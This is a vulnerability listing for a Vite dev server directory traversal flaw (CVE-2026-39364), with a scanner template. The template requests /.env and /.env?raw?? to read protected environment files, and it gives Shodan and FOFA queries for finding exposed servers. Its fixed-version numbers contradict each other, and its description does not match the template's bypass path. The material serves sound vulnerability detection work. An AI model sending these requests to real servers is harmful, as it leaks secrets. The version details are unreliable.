
Vite Dev Server - Directory Traversal

CVE-2026-39364
Verified

Description

Vite is a modern frontend build tool. In Vite prior to versions 6.4.3, 6.3.4, and 5.4.23, a directory traversal vulnerability affects the Vite development server. When the Vite dev server is launched with the --host or server.host option, an unauthenticated attacker can craft a request with a path containing dot segments (e.g., /.vite/../<filename>) to bypass static file restrictions and access arbitrary files on the filesystem under the project root. The vulnerability allows access to files normally denied by Vite’s "server.fs.deny" setting, including sensitive files like .env, configuration files, or credentials in the project root. This issue has been fixed in versions 6.4.3, 6.3.4, and 5.4.23.

Severity

High

CVSS Score

7.5

Exploit Probability

7%

Published Date

April 9, 2026

Template Author

ritikchaddha

CVE-2026-39364.yaml
id: CVE-2026-39364

info:
  name: Vite Dev Server - Directory Traversal
  author: ritikchaddha
  severity: high
  description: |
    Vite is a modern frontend build tool. In Vite prior to versions 6.4.3, 6.3.4, and 5.4.23, a directory traversal vulnerability affects the Vite development server. When the Vite dev server is launched with the --host or server.host option, an unauthenticated attacker can craft a request with a path containing dot segments (e.g., /.vite/../<filename>) to bypass static file restrictions and access arbitrary files on the filesystem under the project root. The vulnerability allows access to files normally denied by Vite’s "server.fs.deny" setting, including sensitive files like .env, configuration files, or credentials in the project root. This issue has been fixed in versions 6.4.3, 6.3.4, and 5.4.23.
  impact: |
    Attackers can retrieve sensitive files like .env or certificates, leading to information disclosure.
  remediation: |
    Update to versions 7.3.2 or 8.0.5 or later.
  reference:
    - https://github.com/vitejs/vite/security/advisories/GHSA-cw47-99h4-q43f
    - https://nvd.nist.gov/vuln/detail/CVE-2026-39364
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2026-39364
    cwe-id: CWE-22
    epss-score: 0.06829
    epss-percentile: 0.91445
  metadata:
    max-request: 2
    fofa-query: body="/@vite/client"
    shodan-query: http.html:"/@vite/client"
  tags: cve,cve2026,vite,exposure,bypass

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/.env"

    matchers:
      - type: status
        status:
          - 403
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/.env?raw??"

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "export default", "data:application/json;base64")'
          - 'contains_any(content_type, "text/javascript", "application/javascript")'
          - '!contains(tolower(body), "<html")'
          - 'status_code == 200'
        condition: and
# digest: 4b0a00483046022100cfe08dd7a24421fc3d699dc7ce6a82f9393d8d7504fa274e44a10307b74b3669022100a745abec3fa06f2911ee8fafd89148e27cb849e864edd69b848d4e3865eccb1e:922c64590222798bb761d5b6d8e72950
CVSS Score: 7.5

CVSS Metrics

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID: CVE-2026-39364
CWE ID: CWE-22

References

https://github.com/vitejs/vite/security/advisories/GHSA-cw47-99h4-q43f
https://nvd.nist.gov/vuln/detail/CVE-2026-39364

Remediation Steps

Update to versions 7.3.2 or 8.0.5 or later.